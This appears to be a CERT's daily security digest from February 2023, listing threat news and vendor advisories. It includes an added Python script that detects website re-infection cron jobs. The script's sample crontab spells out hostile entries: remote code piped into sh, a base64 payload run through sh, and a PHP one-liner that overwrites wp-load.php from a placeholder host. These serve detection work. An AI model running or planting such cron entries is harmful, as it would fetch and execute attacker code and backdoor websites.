Daily summary - 22.02.2023

End-of-Day report

Timeframe: Tuesday 21-02-2023 18:00 - Wednesday 22-02-2023 18:00 Handler: Michael Schlagenhaufer Co-Handler: Stephan Richter

News

Warning of attacks on IBM Aspera Faspex and Mitel MiVoice

The US cybersecurity agency CISA warns that cybercriminals are actively exploiting security vulnerabilities in IBM Aspera Faspex and Mitel MiVoice. Updates are available.

https://heise.de/-7523870


Patch now! Exploit code for critical Fortinet FortiNAC vulnerability in circulation

Since exploit code has been published, attackers could now target Fortinet's network access control solution FortiNAC.

https://heise.de/-7523427


Fake give-aways and gift promotions in the name of "MrBeast"!

Anyone who regularly watches YouTube videos can hardly avoid MrBeast. The YouTuber, with over 134 million subscribers, is known for his give-away videos in which he gives away thousands or even millions of dollars. Criminals exploit this reputation by spreading fraudulent prize promises and gift promotions in MrBeast's name.

https://www.watchlist-internet.at/news/fake-give-aways-und-geschenkaktionen-im-namen-von-mrbeast/


Hydrochasma hackers target medical research labs, shipping firms

A previously unknown threat actor named Hydrochasma has been targeting shipping and medical laboratories involved in COVID-19 vaccine development and treatments.

https://www.bleepingcomputer.com/news/security/hydrochasma-hackers-target-medical-research-labs-shipping-firms/


WhatsApp has ignored a security problem that affects everyone for years

Strangers can take over your profile and impersonate you via recycled phone numbers, without any hacking or phishing.

https://futurezone.at/apps/whatsapp-sicherheit-problem-konto-telefonnummer-recycelt-fremde-account/402337845


Attackers Abuse Cron Jobs to Reinfect Websites

Malicious cron jobs are nothing new; we've seen attackers use them quite frequently to reinfect websites. However, in recent months we've noticed a distinctive new wave of these infections that appears to be closely related to this article about a backdoor that we've been tracking.

https://blog.sucuri.net/2023/02/attackers-abuse-cron-jobs-to-reinfect-websites.html
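As an added example (not code from the Sucuri post or from Sucuri's tooling), the following script parses crontab output and flags entries that show the patterns such re-infection jobs typically rely on: a remote fetch piped into a shell, base64-decoded payloads, inline PHP, executables in world-writable directories, and very frequent schedules. The indicator list and the sample crontab are constructed assumptions for illustration, not indicators from the article.

```python
"""Flag crontab entries that look like website re-infection jobs.

Added example, not from the Sucuri article. The indicators are general
assumptions about common tradecraft and need tuning per host; a hit is a
reason to inspect the entry, not proof of compromise.
"""
import re

# (name, pattern): each pattern is a heuristic applied to the command part,
# except high_frequency, which is applied to the schedule + command.
INDICATORS = [
    ("remote_fetch_to_shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")),
    ("base64_decode", re.compile(r"base64\s+(-d|--decode)")),
    ("php_inline", re.compile(r"\bphp\s+-r\b")),
    ("eval_call", re.compile(r"\beval\s*\(")),
    ("tmp_exec", re.compile(r"(^|[\s;|&])(/tmp|/dev/shm|/var/tmp)/\S+")),
    # "* * * * *" or "*/N * * * *": runs every minute or every N minutes
    ("high_frequency", re.compile(r"^\*(/\d+)?(\s+\*){4}\s")),
]

# Constructed sample: benign entries mixed with suspicious ones.
# 203.0.113.0/24 is a documentation range, not a real host.
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=root
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /usr/local/bin/check_disk.sh
*/5 * * * * curl -s http://203.0.113.10/x.txt | sh
@reboot /bin/sh -c 'echo ZWNobyBoaQ== | base64 -d | sh'
0 * * * * php -r 'file_put_contents("/var/www/html/wp-load.php", file_get_contents("http://203.0.113.10/p"));'
* * * * * /dev/shm/.x/run >/dev/null 2>&1
"""


def parse_crontab(text):
    """Yield (schedule, command) pairs; skip comments, blank lines and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):  # MAILTO=, PATH=, ...
            continue
        if line.startswith("@"):  # @reboot, @hourly, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd.strip()


def flag_cron_entries(text):
    """Return a list of {schedule, command, indicators} for suspicious entries."""
    findings = []
    for sched, cmd in parse_crontab(text):
        full = f"{sched} {cmd}"
        hits = [
            name for name, pat in INDICATORS
            if pat.search(full if name == "high_frequency" else cmd)
        ]
        # A frequent schedule alone is noise (monitoring jobs run every minute);
        # require at least one content indicator as well.
        if hits and hits != ["high_frequency"]:
            findings.append({"schedule": sched, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in flag_cron_entries(SAMPLE_CRONTAB):
        print(f"{', '.join(f['indicators']):32s} {f['schedule']} {f['command']}")
```

In practice you would feed it the output of `crontab -l -u USER` for every account on the host plus the files under /etc/cron.d and /etc/cron.*; the web server's own user is the first one to check, since that is the account a compromised PHP application writes cron entries as. The cron job is only the persistence mechanism: removing it without finding the backdoor that planted it just means it will be back after the next cleanup.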


Threat Actors Adopt Havoc Framework for Post-Exploitation in Targeted Attacks

An open source command-and-control (C2) framework known as Havoc is being adopted by threat actors as an alternative to other well-known legitimate toolkits like Cobalt Strike, Sliver, and Brute Ratel. Cybersecurity firm Zscaler said it observed a new campaign in the beginning of January 2023 targeting an unnamed government organization that utilized Havoc.

https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html


Let's build a Chrome extension that steals everything

Manifest v3 may have taken some of the juice out of browser extensions, but I think there is still plenty left in the tank. To prove it, let's build a Chrome extension that steals as much data as possible.

https://mattfrisbie.substack.com/p/spy-chrome-extension


How NPM Packages Were Used to Spread Phishing Links

[...] On Monday, 20th of February, Checkmarx Labs discovered an anomaly in the NPM ecosystem when we cross-referenced new information with our databases. Clusters of packages had been published in large quantities to the NPM package manager. Further investigation revealed that the packages were part of a trending new attack vector, with attackers spamming the open-source ecosystem with packages containing links to phishing campaigns.

https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/


Android voice chat app with 5m installs leaked user chats

The voice chat app under discussion is OyeTalk, which is available for Android and iOS devices and is operated from Pakistan.

https://www.hackread.com/android-voice-chat-app-data-leak/

Vulnerabilities

Security updates: VMware closes critical security hole

With updates for Carbon Black App Control and vRealize as well as Cloud Foundation, VMware closes one critical and one high-risk vulnerability.

https://heise.de/-7523335


Foxit PDF updates close high-risk vulnerabilities

The PDF software Foxit had security holes through which attackers could have injected and executed malicious code, for instance via manipulated PDF files.

https://heise.de/-7523313


Multiple vulnerabilities in Nokia BTS Airscale ASIKA [PDF]

Synacktiv performed an audit on the base transceiver station Nokia Airscale ASIKA, running the firmware version btsmed_5G19B_GNB_0007_001836_000863, and discovered multiple vulnerabilities.

https://www.synacktiv.com/sites/default/files/2023-02/Synacktiv-Nokia-BTS-AirScale-Asika-Multiple-Vulnerabilities.pdf


Security updates for Wednesday

Security updates have been issued by Debian (amanda, apr-util, and tiff), Fedora (apptainer, git, gssntlmssp, OpenImageIO, openssl, webkit2gtk3, xorg-x11-server, and xorg-x11-server-Xwayland), Oracle (firefox and thunderbird), Red Hat (python3), SUSE (gnutls, php7, and python-Django), and Ubuntu (chromium-browser, libxpm, and mariadb-10.3, mariadb-10.6).

https://lwn.net/Articles/924070/


Synology-SA-23:01 ClamAV

Multiple vulnerabilities allow remote attackers to possibly execute arbitrary code or local users to obtain sensitive information via a susceptible version of Antivirus Essential, Synology Mail Server, and Synology MailPlus Server.

https://www.synology.com/en-global/support/security/Synology_SA_23_01


IBM Security Bulletins 2023-02-22

* A vulnerability in IBM Java affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
* A vulnerability in the GUI affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
* IBM Sterling B2B Integrator is vulnerable to cross-site scripting (CVE-2022-43578)
* IBM Sterling Global Mailbox is vulnerable to arbitrary code execution due to Apache Commons Collections [CVE-2015-6420, CVE-2017-15708]
* IBM WebSphere Application Server, which is bundled with IBM Cloud Pak for Applications, is vulnerable to a remote code execution vulnerability (CVE-2023-23477)
* IBM WebSphere Application Server, which is bundled with IBM WebSphere Hybrid Edition, is vulnerable to a remote code execution vulnerability (CVE-2023-23477)
* Multiple vulnerabilities in the Linux kernel affect IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
* SNMPv3 server credentials are exposed in log files in IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
* The dashboard UI of IBM Sterling B2B Integrator is vulnerable to improper permission control (CVE-2022-40231)
* Vulnerabilities in jsonwebtoken affect IBM Watson Assistant for IBM Cloud Pak for Data
* Vulnerability in Apache Tomcat affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
* Vulnerability in IBM WebSphere Application Server Liberty may affect IBM Spectrum Protect Plus (CVE-2019-11777)
* Vulnerability in Log4j affects IBM Integrated Analytics System [CVE-2022-23305]

https://www.ibm.com/support/pages/bulletin/


Cisco Nexus 9000 Series Fabric Switches in ACI Mode Link Layer Discovery Protocol Memory Leak Denial of Service Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-lldp-dos-ySCNZOpX


Cisco FXOS Software and UCS Manager Software Configuration Backup Static Key Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsm-bkpsky-H8FCQgsA


Cisco NX-OS Software SSH X.509v3 Certificate Authentication with Unsupported Remote Authorization Method Privilege Escalation Issues

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-x509v3-unsupportedconfig-ScRtAbUk


Cisco NX-OS Software CLI Command Injection Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-cli-cmdinject-euQVK9u


Cisco Firepower 4100 Series, Firepower 9300 Security Appliances, and UCS Fabric Interconnects Command Injection Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxfp-cmdinj-XXBZjtR


Cisco Nexus 9300-FX3 Series Fabric Extender for UCS Fabric Interconnects Authentication Bypass Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-elyfex-dos-gfvcByx


Cisco Application Policy Infrastructure Controller and Cisco Cloud Network Controller Cross-Site Request Forgery Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-csrfv-DMx6KSwV


[R1] Stand-alone Security Patch Available for Tenable.sc versions 5.22.0 to 6.0.0: SC-202302.2

https://www.tenable.com/security/tns-2023-06


[R1] Stand-alone Security Patch Available for Tenable.sc versions 5.22.0 to 5.23.1: SC-202302.3

https://www.tenable.com/security/tns-2023-05